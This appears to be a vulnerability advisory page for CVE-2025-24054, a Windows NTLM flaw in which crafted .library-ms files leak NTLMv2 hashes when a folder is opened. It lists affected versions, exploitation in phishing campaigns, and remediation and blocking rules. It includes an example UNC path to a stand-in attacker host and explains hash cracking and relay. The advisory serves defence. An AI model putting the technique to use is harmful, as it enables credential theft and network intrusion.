What is Windows NTLM?
Microsoft Windows is the world's most widely deployed desktop operating system, used by over a billion devices in enterprise, government, and consumer environments. NTLM (NT LAN Manager) is a legacy authentication protocol retained in all modern Windows versions for backward compatibility with older systems. Despite being superseded by Kerberos in domain environments, NTLM remains active on most enterprise networks — particularly for workgroup authentication, SMB file sharing, and HTTP/WebDAV — and has a long history of abuse in credential capture and relay attacks.
Overview
CVE-2025-24054 is a spoofing vulnerability in Windows NTLM that allows an unauthenticated attacker to capture the NTLMv2 credential hash of any user who opens a folder containing a specially crafted file. No double-click or explicit file open is required — simply navigating to the containing directory in Windows Explorer triggers the NTLM authentication handshake to an attacker-controlled server.
Patched in the March 2025 Patch Tuesday release, the flaw was actively exploited in campaigns targeting Eastern European government and energy sector organizations within days of public disclosure. Captured hashes can be cracked offline or immediately relayed to other services accepting NTLM authentication, enabling lateral movement within a network.
Affected Versions
| Product | Vulnerable | Fixed (KB) |
|---|---|---|
| Windows 10 (all editions) | Prior to March 2025 Patch Tuesday | KB5053606 |
| Windows 11 (all editions) | Prior to March 2025 Patch Tuesday | KB5053602 |
| Windows Server 2016 | Prior to March 2025 Patch Tuesday | KB5053594 |
| Windows Server 2019 | Prior to March 2025 Patch Tuesday | KB5053596 |
| Windows Server 2022 | Prior to March 2025 Patch Tuesday | KB5053603 |
| Windows Server 2025 | Prior to March 2025 Patch Tuesday | KB5053598 |
| Windows Server 2012 R2 (ESU) | Prior to March 2025 Patch Tuesday | KB5053891 |
Technical Details
The vulnerability exists in how Windows Explorer and shell components handle .library-ms and related Windows metadata files. These files can contain UNC path references (e.g., \\attacker.com\share) that Windows automatically resolves when the containing folder is opened. Resolution triggers an outbound NTLM authentication attempt to the remote server, sending the user's NTLMv2 hash.
CWE-73 (External Control of File Name or Path) captures the root cause: the shell resolves attacker-supplied remote UNC paths embedded in metadata files without user awareness or consent. The resulting NTLMv2 hash can be:
- Cracked offline — NTLMv2 hashes are susceptible to dictionary and brute-force attacks, especially for common or weak passwords.
- Relayed — In an NTLM relay attack, the hash is forwarded in real time to another service (e.g., SMB, LDAP, HTTP) on the victim's network, authenticating as the victim without ever cracking the password.
The CVSS vector (AV:N, PR:N, UI:R) reflects that the attacker needs no privileges but does require the victim to open the malicious folder — typically delivered via a phishing email or embedded in a downloaded archive.
Discovery
Reported to Microsoft through coordinated disclosure and patched in the March 11, 2025 Patch Tuesday release. Exploitation in the wild was documented by Check Point Research, which observed campaigns targeting Polish and Ukrainian government entities beginning shortly after patch publication.
Exploitation Context
Active exploitation was observed within days of the March 2025 Patch Tuesday disclosure. Threat actors distributed crafted .library-ms files inside phishing emails and archive attachments (ZIP, RAR). Upon extraction, simply opening the containing folder in Windows Explorer silently transmitted the victim's NTLMv2 hash to attacker-controlled SMB servers.
Campaigns primarily targeted government agencies, energy sector organizations, and financial institutions in Poland, Ukraine, and surrounding countries. The collected hashes were used in both offline cracking operations and NTLM relay attacks to pivot within victim networks.
Remediation
- Apply the March 2025 Patch Tuesday updates (see KB numbers in the Affected Versions table above).
- Restrict outbound NTLM via Group Policy: configure Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers to block or audit external NTLM authentication.
- Block outbound SMB (TCP 445) and WebDAV traffic (TCP 80/443 to non-corporate endpoints) at the network perimeter to prevent hash capture by external servers.
- Enable SMB signing on all Windows clients and servers to reduce the value of captured hashes in relay scenarios.
- Monitor Windows Event Logs (Event ID 4625, 4776) and network logs for NTLM authentication attempts to external or unusual hosts.
- Consider email gateway rules to block archive attachments containing
.library-ms,.lnk, or.urlfiles from external senders.
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2025-24054 |
| Vendor / Product | Microsoft — Windows |
| NVD Published | 2025-03-11 |
| NVD Last Modified | 2026-02-13 |
| CVSS 3.1 Score | 6.5 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |
| Severity | MEDIUM |
| CWE | CWE-73 find similar ↗ |
| CISA KEV Added | 2025-04-17 |
| CISA KEV Deadline | 2025-05-08 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
Required Action
Timeline
| Date | Event |
|---|---|
| 2025-03-11 | CVE published; Microsoft Patch Tuesday fix released |
| 2025-04-17 | Added to CISA Known Exploited Vulnerabilities catalog |
| 2025-05-08 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| Microsoft Security Response Center — CVE-2025-24054 | Vendor Advisory |
| NVD — CVE-2025-24054 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |